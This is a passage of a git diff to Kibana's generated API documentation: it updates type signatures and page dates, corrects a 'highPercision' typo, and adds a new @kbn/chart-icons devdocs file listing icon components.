"src/plugins/home/server/services/tutorials/lib/tutorials_registry_types.ts", "deprecated": false, 
@@ -1752,7 +1752,7 @@ "label": "TutorialSchema", "description": [], "signature": [ - "{ readonly isBeta?: boolean | undefined; readonly savedObjects?: any[] | undefined; readonly euiIconType?: string | undefined; readonly previewImagePath?: string | undefined; readonly moduleName?: string | undefined; readonly completionTimeMinutes?: number | undefined; readonly elasticCloud?: Readonly<{ params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; id: string; label: string; }>[] | undefined; } & { instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; title?: string | undefined; success?: string | undefined; text?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }> | undefined; readonly onPremElasticCloud?: Readonly<{ params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; id: string; label: string; }>[] | undefined; } & { instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; title?: string | undefined; success?: string | undefined; text?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: 
Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }> | undefined; readonly artifacts?: Readonly<{ application?: Readonly<{} & { path: string; label: string; }> | undefined; exportedFields?: Readonly<{} & { documentationUrl: string; }> | undefined; } & { dashboards: Readonly<{ linkLabel?: string | undefined; } & { id: string; isOverview: boolean; }>[]; }> | undefined; readonly savedObjectsInstallMsg?: string | undefined; readonly customStatusCheckName?: string | undefined; readonly integrationBrowserCategories?: string[] | undefined; readonly eprPackageOverlap?: string | undefined; readonly id: string; readonly name: string; readonly category: \"other\" | \"security\" | \"metrics\" | \"logging\"; readonly shortDescription: string; readonly longDescription: string; readonly onPrem: Readonly<{ params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; id: string; label: string; }>[] | undefined; } & { instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; title?: string | undefined; success?: string | undefined; text?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }>; }" + "{ readonly isBeta?: boolean | undefined; readonly savedObjects?: any[] | undefined; readonly euiIconType?: string | undefined; readonly previewImagePath?: string | 
undefined; readonly moduleName?: string | undefined; readonly completionTimeMinutes?: number | undefined; readonly elasticCloud?: Readonly<{ params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; label: string; id: string; }>[] | undefined; } & { instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; success?: string | undefined; text?: string | undefined; title?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }> | undefined; readonly onPremElasticCloud?: Readonly<{ params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; label: string; id: string; }>[] | undefined; } & { instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; success?: string | undefined; text?: string | undefined; title?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }> | undefined; readonly artifacts?: Readonly<{ 
application?: Readonly<{} & { path: string; label: string; }> | undefined; exportedFields?: Readonly<{} & { documentationUrl: string; }> | undefined; } & { dashboards: Readonly<{ linkLabel?: string | undefined; } & { id: string; isOverview: boolean; }>[]; }> | undefined; readonly savedObjectsInstallMsg?: string | undefined; readonly customStatusCheckName?: string | undefined; readonly integrationBrowserCategories?: string[] | undefined; readonly eprPackageOverlap?: string | undefined; readonly id: string; readonly name: string; readonly category: \"other\" | \"security\" | \"metrics\" | \"logging\"; readonly shortDescription: string; readonly longDescription: string; readonly onPrem: Readonly<{ params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; label: string; id: string; }>[] | undefined; } & { instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; success?: string | undefined; text?: string | undefined; title?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }>; }" ], "path": "src/plugins/home/server/services/tutorials/lib/tutorial_schema.ts", "deprecated": false, 
@@ -2021,7 +2021,7 @@ "signature": [ "{ getSampleDatasets: () => ", "Writable", - "[]; previewImagePath: string; overviewDashboard: string; defaultIndex: string; dataIndices: Readonly<{} & { id: string; fields: Record; timeFields: string[]; dataPath: string; currentTimeMarker: string; preserveDayOfWeekTimeOfDay: boolean; }>[]; }>>[]; addSavedObjectsToSampleDataset: (id: string, savedObjects: ", + "[]; previewImagePath: string; overviewDashboard: string; defaultIndex: string; dataIndices: Readonly<{} & { id: string; fields: Record; timeFields: string[]; dataPath: string; currentTimeMarker: string; preserveDayOfWeekTimeOfDay: boolean; }>[]; }>>[]; addSavedObjectsToSampleDataset: (id: string, savedObjects: ", "SavedObject", "[]) => void; addAppLinksToSampleDataset: (id: string, appLinks: ", { diff --git a/api_docs/home.mdx b/api_docs/home.mdx index a147691a629d6..013c15505f037 100644 --- a/api_docs/home.mdx +++ b/api_docs/home.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/home title: "home" image: https://source.unsplash.com/400x175/?github description: API docs for the home plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'home'] --- import homeObj from './home.devdocs.json'; diff --git a/api_docs/index_lifecycle_management.mdx b/api_docs/index_lifecycle_management.mdx index 82e7e378ab7de..0a2ad674489bc 100644 --- a/api_docs/index_lifecycle_management.mdx +++ b/api_docs/index_lifecycle_management.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/indexLifecycleManagement title: "indexLifecycleManagement" image: https://source.unsplash.com/400x175/?github description: API docs for the indexLifecycleManagement plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'indexLifecycleManagement'] --- import indexLifecycleManagementObj from './index_lifecycle_management.devdocs.json'; 
diff --git a/api_docs/index_management.mdx b/api_docs/index_management.mdx index 4ea15b9efa4e1..9ee4a784b6c61 100644 --- a/api_docs/index_management.mdx +++ b/api_docs/index_management.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/indexManagement title: "indexManagement" image: https://source.unsplash.com/400x175/?github description: API docs for the indexManagement plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'indexManagement'] --- import indexManagementObj from './index_management.devdocs.json'; diff --git a/api_docs/infra.devdocs.json b/api_docs/infra.devdocs.json index d9ee7fb6b4497..9fb1cc6dedd69 100644 --- a/api_docs/infra.devdocs.json +++ b/api_docs/infra.devdocs.json @@ -265,10 +265,10 @@ }, { "parentPluginId": "infra", - "id": "def-public.FORMATTERS.highPercision", + "id": "def-public.FORMATTERS.highPrecision", "type": "Function", "tags": [], - "label": "highPercision", + "label": "highPrecision", "description": [], "signature": [ "(val: number) => string" @@ -279,7 +279,7 @@ "children": [ { "parentPluginId": "infra", - "id": "def-public.FORMATTERS.highPercision.$1", + "id": "def-public.FORMATTERS.highPrecision.$1", "type": "number", "tags": [], "label": "val", diff --git a/api_docs/infra.mdx b/api_docs/infra.mdx index 00a25a8375163..9d1388b056cab 100644 --- a/api_docs/infra.mdx +++ b/api_docs/infra.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/infra title: "infra" image: https://source.unsplash.com/400x175/?github description: API docs for the infra plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'infra'] --- import infraObj from './infra.devdocs.json'; diff --git a/api_docs/inspector.mdx b/api_docs/inspector.mdx index 088e3954cbc03..24b59fa61ecf2 100644 --- a/api_docs/inspector.mdx +++ b/api_docs/inspector.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/inspector title: "inspector" image: https://source.unsplash.com/400x175/?github description: API docs for the inspector plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'inspector'] --- import inspectorObj from './inspector.devdocs.json'; diff --git a/api_docs/interactive_setup.mdx b/api_docs/interactive_setup.mdx index 3beb05f2aa55f..9b11c63613ce6 100644 --- a/api_docs/interactive_setup.mdx +++ b/api_docs/interactive_setup.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/interactiveSetup title: "interactiveSetup" image: https://source.unsplash.com/400x175/?github description: API docs for the interactiveSetup plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'interactiveSetup'] --- import interactiveSetupObj from './interactive_setup.devdocs.json'; diff --git a/api_docs/kbn_ace.mdx b/api_docs/kbn_ace.mdx index 954d2f0a0ca45..e510437eda12a 100644 --- a/api_docs/kbn_ace.mdx +++ b/api_docs/kbn_ace.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-ace title: "@kbn/ace" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/ace plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/ace'] --- import kbnAceObj from './kbn_ace.devdocs.json'; diff --git a/api_docs/kbn_aiops_components.mdx b/api_docs/kbn_aiops_components.mdx index 89c1b200aea44..a585502c902e4 100644 --- a/api_docs/kbn_aiops_components.mdx +++ b/api_docs/kbn_aiops_components.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-aiops-components title: "@kbn/aiops-components" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/aiops-components plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/aiops-components'] --- import kbnAiopsComponentsObj from './kbn_aiops_components.devdocs.json'; 
diff --git a/api_docs/kbn_aiops_utils.mdx b/api_docs/kbn_aiops_utils.mdx index dd3f6a4daff9a..cf3880109c7f3 100644 --- a/api_docs/kbn_aiops_utils.mdx +++ b/api_docs/kbn_aiops_utils.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-aiops-utils title: "@kbn/aiops-utils" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/aiops-utils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/aiops-utils'] --- import kbnAiopsUtilsObj from './kbn_aiops_utils.devdocs.json'; diff --git a/api_docs/kbn_alerts.mdx b/api_docs/kbn_alerts.mdx index e13280df8c109..d70a441d20a64 100644 --- a/api_docs/kbn_alerts.mdx +++ b/api_docs/kbn_alerts.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-alerts title: "@kbn/alerts" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/alerts plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/alerts'] --- import kbnAlertsObj from './kbn_alerts.devdocs.json'; diff --git a/api_docs/kbn_analytics.mdx b/api_docs/kbn_analytics.mdx index f474a9b6b4262..4ee91d6535580 100644 --- a/api_docs/kbn_analytics.mdx +++ b/api_docs/kbn_analytics.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-analytics title: "@kbn/analytics" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/analytics plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/analytics'] --- import kbnAnalyticsObj from './kbn_analytics.devdocs.json'; diff --git a/api_docs/kbn_analytics_client.devdocs.json b/api_docs/kbn_analytics_client.devdocs.json index a2543aacc179c..4bf4b8891da73 100644 --- a/api_docs/kbn_analytics_client.devdocs.json +++ b/api_docs/kbn_analytics_client.devdocs.json 
@@ -1760,7 +1760,7 @@ "Types matching string values" ], "signature": [ - "\"text\" | \"date\" | \"keyword\"" + "\"date\" | \"keyword\" | \"text\"" ], "path": "packages/analytics/client/src/schema/types.ts", "deprecated": false, @@ -1776,7 +1776,7 @@ "\nPossible type values in the schema" ], "signature": [ - "\"boolean\" | \"text\" | \"date\" | \"keyword\" | \"long\" | \"double\" | \"short\" | \"float\" | \"integer\" | \"byte\"" + "\"boolean\" | \"date\" | \"keyword\" | \"text\" | \"long\" | \"double\" | \"short\" | \"float\" | \"integer\" | \"byte\"" ], "path": "packages/analytics/client/src/schema/types.ts", "deprecated": false, diff --git a/api_docs/kbn_analytics_client.mdx b/api_docs/kbn_analytics_client.mdx index e46ec8be1113e..0b514021a1a52 100644 --- a/api_docs/kbn_analytics_client.mdx +++ b/api_docs/kbn_analytics_client.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-analytics-client title: "@kbn/analytics-client" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/analytics-client plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/analytics-client'] --- import kbnAnalyticsClientObj from './kbn_analytics_client.devdocs.json'; diff --git a/api_docs/kbn_analytics_shippers_elastic_v3_browser.mdx b/api_docs/kbn_analytics_shippers_elastic_v3_browser.mdx index 20b2caacae4bd..c51597e2396c8 100644 --- a/api_docs/kbn_analytics_shippers_elastic_v3_browser.mdx +++ b/api_docs/kbn_analytics_shippers_elastic_v3_browser.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-analytics-shippers-elastic-v3-browser title: "@kbn/analytics-shippers-elastic-v3-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/analytics-shippers-elastic-v3-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/analytics-shippers-elastic-v3-browser'] --- import kbnAnalyticsShippersElasticV3BrowserObj from './kbn_analytics_shippers_elastic_v3_browser.devdocs.json'; diff --git a/api_docs/kbn_analytics_shippers_elastic_v3_common.mdx b/api_docs/kbn_analytics_shippers_elastic_v3_common.mdx index ed9b65baaa7b4..1e68519814189 100644 --- a/api_docs/kbn_analytics_shippers_elastic_v3_common.mdx +++ b/api_docs/kbn_analytics_shippers_elastic_v3_common.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-analytics-shippers-elastic-v3-common title: "@kbn/analytics-shippers-elastic-v3-common" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/analytics-shippers-elastic-v3-common plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/analytics-shippers-elastic-v3-common'] --- import kbnAnalyticsShippersElasticV3CommonObj from './kbn_analytics_shippers_elastic_v3_common.devdocs.json'; diff --git a/api_docs/kbn_analytics_shippers_elastic_v3_server.mdx b/api_docs/kbn_analytics_shippers_elastic_v3_server.mdx index 635578447e2df..4582e1f40f686 100644 --- a/api_docs/kbn_analytics_shippers_elastic_v3_server.mdx +++ b/api_docs/kbn_analytics_shippers_elastic_v3_server.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-analytics-shippers-elastic-v3-server title: "@kbn/analytics-shippers-elastic-v3-server" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/analytics-shippers-elastic-v3-server plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/analytics-shippers-elastic-v3-server'] --- import kbnAnalyticsShippersElasticV3ServerObj from './kbn_analytics_shippers_elastic_v3_server.devdocs.json'; diff --git a/api_docs/kbn_analytics_shippers_fullstory.mdx b/api_docs/kbn_analytics_shippers_fullstory.mdx index cbe1e50d88168..d646b6198ed68 100644 --- a/api_docs/kbn_analytics_shippers_fullstory.mdx +++ b/api_docs/kbn_analytics_shippers_fullstory.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-analytics-shippers-fullstory title: "@kbn/analytics-shippers-fullstory" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/analytics-shippers-fullstory plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/analytics-shippers-fullstory'] --- import kbnAnalyticsShippersFullstoryObj from './kbn_analytics_shippers_fullstory.devdocs.json'; diff --git a/api_docs/kbn_apm_config_loader.mdx b/api_docs/kbn_apm_config_loader.mdx index 276fa03de2919..43fd4a9d534ad 100644 --- a/api_docs/kbn_apm_config_loader.mdx +++ b/api_docs/kbn_apm_config_loader.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-apm-config-loader title: "@kbn/apm-config-loader" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/apm-config-loader plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/apm-config-loader'] --- import kbnApmConfigLoaderObj from './kbn_apm_config_loader.devdocs.json'; diff --git a/api_docs/kbn_apm_utils.mdx b/api_docs/kbn_apm_utils.mdx index d6afbdaebb974..bc47cd4d28f90 100644 --- a/api_docs/kbn_apm_utils.mdx 
+++ b/api_docs/kbn_apm_utils.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-apm-utils title: "@kbn/apm-utils" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/apm-utils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/apm-utils'] --- import kbnApmUtilsObj from './kbn_apm_utils.devdocs.json'; diff --git a/api_docs/kbn_axe_config.mdx b/api_docs/kbn_axe_config.mdx index 8346f2ef37977..e9b647c4b14ca 100644 --- a/api_docs/kbn_axe_config.mdx +++ b/api_docs/kbn_axe_config.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-axe-config title: "@kbn/axe-config" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/axe-config plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/axe-config'] --- import kbnAxeConfigObj from './kbn_axe_config.devdocs.json'; diff --git a/api_docs/kbn_bazel_packages.mdx b/api_docs/kbn_bazel_packages.mdx index eeccaac398aa1..9290085ef03b2 100644 --- a/api_docs/kbn_bazel_packages.mdx +++ b/api_docs/kbn_bazel_packages.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-bazel-packages title: "@kbn/bazel-packages" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/bazel-packages plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/bazel-packages'] --- import kbnBazelPackagesObj from './kbn_bazel_packages.devdocs.json'; diff --git a/api_docs/kbn_chart_icons.devdocs.json b/api_docs/kbn_chart_icons.devdocs.json new file mode 100644 index 0000000000000..aad32da9e7286 --- /dev/null +++ b/api_docs/kbn_chart_icons.devdocs.json 
@@ -0,0 +1,1253 @@ +{ + "id": "@kbn/chart-icons", + "client": { + "classes": [], + "functions": [], + "interfaces": [], + "enums": [], + "misc": [], + "objects": [] + }, + "server": { + "classes": [], + "functions": [], + "interfaces": [], + "enums": [], + "misc": [], + "objects": [] + }, + "common": { + "classes": [], + "functions": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.DropIllustration", + "type": "Function", + "tags": [], + "label": "DropIllustration", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/drop_illustration.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.DropIllustration.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/drop_illustration.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisBottom", + "type": "Function", + "tags": [], + "label": "EuiIconAxisBottom", + "description": [], + "signature": [ + "({ title, titleId, ...props }: { title: string; titleId: string; }) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/axis_bottom.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisBottom.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/axis_bottom.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisBottom.$1.title", + "type": "string", + "tags": [], + "label": "title", + 
"description": [], + "path": "packages/kbn-chart-icons/src/assets/axis_bottom.tsx", + "deprecated": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisBottom.$1.titleId", + "type": "string", + "tags": [], + "label": "titleId", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/axis_bottom.tsx", + "deprecated": false + } + ] + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisLeft", + "type": "Function", + "tags": [], + "label": "EuiIconAxisLeft", + "description": [], + "signature": [ + "({ title, titleId, ...props }: { title: string; titleId: string; }) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/axis_left.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisLeft.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/axis_left.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisLeft.$1.title", + "type": "string", + "tags": [], + "label": "title", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/axis_left.tsx", + "deprecated": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisLeft.$1.titleId", + "type": "string", + "tags": [], + "label": "titleId", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/axis_left.tsx", + "deprecated": false + } + ] + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisRight", + "type": "Function", + "tags": [], + "label": "EuiIconAxisRight", + "description": [], + "signature": [ + "({ title, titleId, ...props }: { title: string; titleId: string; }) => JSX.Element" + ], + "path": 
"packages/kbn-chart-icons/src/assets/axis_right.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisRight.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/axis_right.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisRight.$1.title", + "type": "string", + "tags": [], + "label": "title", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/axis_right.tsx", + "deprecated": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisRight.$1.titleId", + "type": "string", + "tags": [], + "label": "titleId", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/axis_right.tsx", + "deprecated": false + } + ] + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisTop", + "type": "Function", + "tags": [], + "label": "EuiIconAxisTop", + "description": [], + "signature": [ + "({ title, titleId, ...props }: { title: string; titleId: string; }) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/axis_top.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisTop.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/axis_top.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisTop.$1.title", + "type": "string", + "tags": [], + "label": "title", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/axis_top.tsx", + "deprecated": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisTop.$1.titleId", + "type": 
"string", + "tags": [], + "label": "titleId", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/axis_top.tsx", + "deprecated": false + } + ] + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconLegend", + "type": "Function", + "tags": [], + "label": "EuiIconLegend", + "description": [], + "signature": [ + "({ title, titleId, ...props }: { title: string; titleId: string; }) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/legend.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconLegend.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/legend.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconLegend.$1.title", + "type": "string", + "tags": [], + "label": "title", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/legend.tsx", + "deprecated": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconLegend.$1.titleId", + "type": "string", + "tags": [], + "label": "titleId", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/legend.tsx", + "deprecated": false + } + ] + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.GlobeIllustration", + "type": "Function", + "tags": [], + "label": "GlobeIllustration", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/globe_illustration.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.GlobeIllustration.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, 
...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/globe_illustration.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartArea", + "type": "Function", + "tags": [], + "label": "IconChartArea", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_area.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartArea.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_area.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartAreaPercentage", + "type": "Function", + "tags": [], + "label": "IconChartAreaPercentage", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_area_percentage.tsx", + "deprecated": false, + "children": [ + { + 